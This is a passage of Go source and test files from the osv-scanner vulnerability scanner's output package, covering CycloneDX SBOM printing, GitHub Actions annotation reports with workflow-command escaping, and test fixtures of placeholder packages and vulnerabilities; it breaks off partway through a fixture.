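	"github.com/CycloneDX/cyclonedx-go"
	"github.com/google/osv-scanner/v2/internal/output/sbom"
	"github.com/google/osv-scanner/v2/internal/utility/purl"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// PrintCycloneDXResults writes results to the provided writer in CycloneDX format.
//
// The scan results are grouped by PURL, converted into a BOM by the creator
// registered for cycloneDXVersion, and encoded as pretty-printed JSON.
//
// The returned error joins the encoder error with any errors reported while
// grouping by PURL. The BOM is still written when grouping reported errors, so
// a non-nil error can accompany output that was produced; callers that publish
// the BOM should check the error before trusting it as a complete inventory
// (presumably packages that failed grouping are absent from it; verify against
// purl.Group).
func PrintCycloneDXResults(vulnResult *models.VulnerabilityResults, cycloneDXVersion models.CycloneDXVersion, outputWriter io.Writer) error {
	bomCreator := sbom.SpecVersionToBomCreator[cycloneDXVersion]
	if bomCreator == nil {
		// Without this guard an unregistered version would be called as a nil
		// function below and crash the process instead of reporting an error.
		return errors.New("unsupported CycloneDX version")
	}

	resultsByPurl, errs := purl.Group(vulnResult.Results)

	bom := bomCreator(resultsByPurl)
	encoder := cyclonedx.NewBOMEncoder(outputWriter, cyclonedx.BOMFileFormatJSON)
	encoder.SetPretty(true)

	err := encoder.Encode(bom)

	// errors.Join drops nil values, so this is nil when nothing went wrong.
	return errors.Join(err, errors.Join(errs...))
}

================================================
FILE: internal/output/cyclonedx_test.go
================================================
package output_test

import (
	"bytes"
	"testing"

	"github.com/google/osv-scanner/v2/internal/output"
	"github.com/google/osv-scanner/v2/internal/testutility"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// testCycloneDXResults runs testFunc with a runner that prints each test case
// in the given CycloneDX version and compares the output with a snapshot.
func testCycloneDXResults(t *testing.T, version models.CycloneDXVersion, testFunc func(*testing.T, func(*testing.T, outputTestCaseArgs))) {
	t.Helper()

	testFunc(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		outputWriter := &bytes.Buffer{}
		err := output.PrintCycloneDXResults(args.vulnResult, version, outputWriter)

		if err != nil {
			t.Errorf("%v", err)
		}

		testutility.NewSnapshot().MatchText(t, outputWriter.String())
	})
}

// TestPrintCycloneDXResults covers every combination of the three CycloneDX
// versions listed below with the three shared output test suites.
func TestPrintCycloneDXResults(t *testing.T) {
	t.Parallel()

	tests := []struct {
		name    string
		version models.CycloneDXVersion
		testFn  func(*testing.T, func(*testing.T, outputTestCaseArgs))
	}{
		{"CycloneDX14_WithVulnerabilities", models.CycloneDXVersion14, testOutputWithVulnerabilities},
		{"CycloneDX14_WithLicenseViolations", models.CycloneDXVersion14, testOutputWithLicenseViolations},
		{"CycloneDX14_WithMixedIssues", models.CycloneDXVersion14, testOutputWithMixedIssues},
		{"CycloneDX15_WithVulnerabilities", models.CycloneDXVersion15, testOutputWithVulnerabilities},
		{"CycloneDX15_WithLicenseViolations", models.CycloneDXVersion15, testOutputWithLicenseViolations},
		{"CycloneDX15_WithMixedIssues", models.CycloneDXVersion15, testOutputWithMixedIssues},
		{"CycloneDX16_WithVulnerabilities", models.CycloneDXVersion16, testOutputWithVulnerabilities},
		{"CycloneDX16_WithLicenseViolations", models.CycloneDXVersion16, testOutputWithLicenseViolations},
		{"CycloneDX16_WithMixedIssues", models.CycloneDXVersion16, testOutputWithMixedIssues},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			testCycloneDXResults(t, tt.version, tt.testFn)
		})
	}
}

================================================
FILE: internal/output/form.go
================================================
package output

// Form returns the singular or plural form that should be used based on the given count.
//
// Only a count of exactly 1 selects singular; every other value, including 0
// and negative numbers, selects plural.
func Form(count int, singular, plural string) string {
	if count == 1 {
		return singular
	}

	return plural
}

================================================
FILE: internal/output/form_test.go
================================================
package output_test

import (
	"testing"

	"github.com/google/osv-scanner/v2/internal/output"
)

// TestForm checks that Form picks the plural for 0 and 2 and the singular for 1.
func TestForm(t *testing.T) {
	t.Parallel()

	type args struct {
		count    int
		singular string
		plural   string
	}
	tests := []struct {
		name string
		args args
		want string
	}{
		{
			name: "",
			args: args{
				count:    0,
				singular: "package",
				plural:   "packages",
			},
			want: "packages",
		},
		{
			name: "",
			args: args{
				count:    1,
				singular: "package",
				plural:   "packages",
			},
			want: "package",
		},
		{
			name: "",
			args: args{
				count:    2,
				singular: "package",
				plural:   "packages",
			},
			want: "packages",
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			if got := output.Form(tt.args.count, tt.args.singular, tt.args.plural); got != tt.want {
				t.Errorf("Form() = %v, want %v", got, tt.want)
			}
		})
	}
}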
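================================================
FILE: internal/output/githubannotation.go
================================================
package output

import (
	"fmt"
	"io"
	"path/filepath"
	"strings"

	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/jedib0t/go-pretty/v6/table"
)

// createSourceRemediationTable creates a vulnerability table which includes the fixed versions for a specific source file.
//
// One row is added per vulnerability group of each package in source. Fixed
// versions are looked up in groupedFixedVersions under the key
// "<source string>:<group index string>". The boolean result reports whether
// at least one row was added.
//
// The package name and version cells are copied as-is from the scan results,
// so the rendered table must be treated as untrusted text by whatever prints it.
func createSourceRemediationTable(source models.PackageSource, groupedFixedVersions map[string][]string) (table.Writer, bool) {
	hasRow := false
	remediationTable := table.NewWriter()
	remediationTable.AppendHeader(table.Row{"Package", "Vulnerability ID", "CVSS", "Current Version", "Fixed Version"})

	for _, pv := range source.Packages {
		for _, group := range pv.Groups {
			fixedVersions := groupedFixedVersions[source.Source.String()+":"+group.IndexString()]

			// Show every ID of the group as a link to its osv.dev page.
			vulnIDs := make([]string, 0, len(group.IDs))
			for _, id := range group.IDs {
				vulnIDs = append(vulnIDs, "https://osv.dev/"+id)
			}

			remediationTable.AppendRow(table.Row{
				pv.Package.Name,
				strings.Join(vulnIDs, "\n"),
				group.MaxSeverity,
				pv.Package.Version,
				strings.Join(fixedVersions, "\n")})
			hasRow = true
		}
	}

	return remediationTable, hasRow
}

// createDeprecationTable creates a table listing the packages of source that
// are flagged as deprecated. The boolean result reports whether at least one
// row was added.
func createDeprecationTable(source models.PackageSource) (table.Writer, bool) {
	hasRow := false
	deprecationTable := table.NewWriter()
	deprecationTable.AppendHeader(table.Row{"Package", "Current Version", "Deprecated"})

	for _, pv := range source.Packages {
		if pv.Package.Deprecated {
			deprecationTable.AppendRow(table.Row{
				pv.Package.Name,
				pv.Package.Version,
				pv.Package.Deprecated,
			})
			hasRow = true
		}
	}

	return deprecationTable, hasRow
}

// PrintGHAnnotationReport prints Github specific annotations to outputWriter.
//
// For every source that has packages it writes up to two "::error" workflow
// commands: one carrying the remediation table and one carrying the
// deprecation table. The annotated file is the source path relative to the
// working directory, using forward slashes; the source path is used unchanged
// when it cannot be made relative.
//
// Paths, package names and versions originate from the scanned project, so
// they are escaped the way GitHub documents for workflow commands before being
// written. The function always returns nil; write errors are not reported.
func PrintGHAnnotationReport(vulnResult *models.VulnerabilityResults, outputWriter io.Writer) error {
	flattened := vulnResult.Flatten()

	// TODO: Also support last affected
	groupedFixedVersions := groupFixedVersions(flattened)
	workingDir := mustGetWorkingDirectory()

	// Workflow command escaping: '%' has to be escaped as well as line breaks,
	// otherwise a '%0A' or '%0D' sequence inside a package name or version is
	// decoded by the runner as a real line break. Property values additionally
	// escape ':' and ',' because those delimit properties in the command.
	dataEscaper := strings.NewReplacer("%", "%25", "\r", "%0D", "\n", "%0A")
	propertyEscaper := strings.NewReplacer("%", "%25", "\r", "%0D", "\n", "%0A", ":", "%3A", ",", "%2C")

	for _, source := range vulnResult.Results {
		if len(source.Packages) == 0 {
			continue
		}

		// TODO: Support docker images

		var artifactPath string
		var err error
		artifactPath, err = filepath.Rel(workingDir, source.Source.Path)
		if err != nil {
			artifactPath = source.Source.Path
		}
		artifactPath = filepath.ToSlash(artifactPath)

		fileProperty := propertyEscaper.Replace(artifactPath)
		messagePath := dataEscaper.Replace(artifactPath)

		remediationTable, hasVulnTable := createSourceRemediationTable(source, groupedFixedVersions)
		if hasVulnTable {
			// This is required as github action annotations must be on the same terminal line
			// so the new line characters of the rendered table are percent-encoded
			renderedTable := dataEscaper.Replace(remediationTable.Render())
			// Prepend the table with a new line to look nicer in the output
			// NOTE(review): no line terminator is written after the command; confirm
			// that consecutive annotations are still parsed separately by the runner.
			fmt.Fprintf(outputWriter, "::error file=%s::%s%s", fileProperty, messagePath, "%0A"+renderedTable)
		}

		// Create and render package deprecation table
		deprecationTable, hasDeprecationTable := createDeprecationTable(source)
		if hasDeprecationTable {
			renderedDeprecationTable := dataEscaper.Replace(deprecationTable.Render())
			fmt.Fprintf(outputWriter, "::error file=%s::%s%s", fileProperty, messagePath, "%0A"+renderedDeprecationTable)
		}
	}

	return nil
}

================================================
FILE: internal/output/githubannotation_test.go
================================================
package output_test

import (
	"bytes"
	"testing"

	"github.com/google/osv-scanner/v2/internal/output"
	"github.com/google/osv-scanner/v2/internal/testutility"
)

// TestPrintGHAnnotationReport_WithVulnerabilities snapshots the annotation
// output for every case of the shared vulnerabilities suite.
func TestPrintGHAnnotationReport_WithVulnerabilities(t *testing.T) {
	t.Parallel()

	testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		outputWriter := &bytes.Buffer{}
		err := output.PrintGHAnnotationReport(args.vulnResult, outputWriter)

		if err != nil {
			t.Errorf("Error writing GH annotation output: %s", err)
		}

		testutility.NewSnapshot().MatchText(t, outputWriter.String())
	})
}

func TestPrintGHAnnotationReport_WithLicenseViolations(t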
*testing.T) { t.Parallel() testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintGHAnnotationReport(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing GH annotation output: %s", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintGHAnnotationReport_WithMixedIssues(t *testing.T) { t.Parallel() testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintGHAnnotationReport(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing GH annotation output: %s", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } ================================================ FILE: internal/output/helpers_test.go ================================================ package output_test import ( "path/filepath" "testing" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/dotnetpe" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/packageslockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/packagelockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/php/composerlock" "github.com/google/osv-scalibr/purl" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" ) type outputTestCaseArgs struct { vulnResult *models.VulnerabilityResults } type outputTestCase struct { name string args outputTestCaseArgs } type outputTestRunner = func(t *testing.T, args outputTestCaseArgs) type pkginfo struct { Name string OSPackageName string Version string Ecosystem string Deprecated bool Commit string ImageOrigin *models.ImageOriginDetails Extractor extractor.Extractor } func resolvePURLType(eco string) string { switch eco { case "npm": return 
purl.TypeNPM case "NuGet": return purl.TypeNuget case "Packagist": return purl.TypeComposer } panic("unknown PURL type for ecosystem " + eco) } func newPackageInfo(source string, pi pkginfo) models.PackageInfo { info := models.PackageInfo{ Name: pi.Name, OSPackageName: pi.OSPackageName, Version: pi.Version, Ecosystem: pi.Ecosystem, Commit: pi.Commit, ImageOrigin: pi.ImageOrigin, Deprecated: pi.Deprecated, Inventory: &extractor.Package{ Name: pi.Name, Version: pi.Version, Plugins: []string{pi.Extractor.Name()}, Location: extractor.LocationFromPath(source), PURLType: resolvePURLType(pi.Ecosystem), }, } return info } func testOutputWithVulnerabilities(t *testing.T, run outputTestRunner) { t.Helper() cwd := filepath.ToSlash(testutility.GetCurrentWorkingDirectory(t)) tests := []outputTestCase{ { name: "no_sources", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{}, }, }, }, { name: "one_source_with_no_packages", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{}, }, }, }, }, }, { name: "multiple_sources_with_no_packages", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{}, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{}, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{}, }, }, }, }, }, { name: "one_source_with_one_package,_no_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: 
models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), 
Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_one_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package,_one_vulnerability,_and_a_max_severity", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}, MaxSeverity: "9"}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Commit: "abc123", Extractor: packagelockjson.Extractor{}, }), 
Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_with_just_a_commit_and_one_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Ecosystem: "npm", Commit: "abc123", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_one_called_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: true}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_one_uncalled_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: 
[]models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: false}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{ { IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: true}, }, }, { IDs: []string{"GHSA-123"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "GHSA-123": {Called: false}, }, }, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "GHSA-123", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_one_vulnerability_(dev)", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), 
DepGroups: []string{"dev"}, Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "two_sources_with_the_same_vulnerable_package", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev"}, Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ 
IDs: []string{"OSV-1", "GHSA-123"}, Aliases: []string{"OSV-1", "GHSA-123"}, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "GHSA-123", Summary: "Something scary!", Aliases: []string{"OSV-1"}, Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1", "GHSA-123"}, Aliases: []string{"OSV-1", "GHSA-123"}, MaxSeverity: "8.3", }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "GHSA-123", Summary: "Something scary!", Aliases: []string{"OSV-1"}, Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1", "GHSA-123"}, Aliases: []string{"OSV-1", "GHSA-123"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: false}, }, }}, 
Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "GHSA-123", Summary: "Something scary!", Aliases: []string{"OSV-1"}, Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "two_sources_with_packages,_one_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "5.9.0", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: 
"1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: 
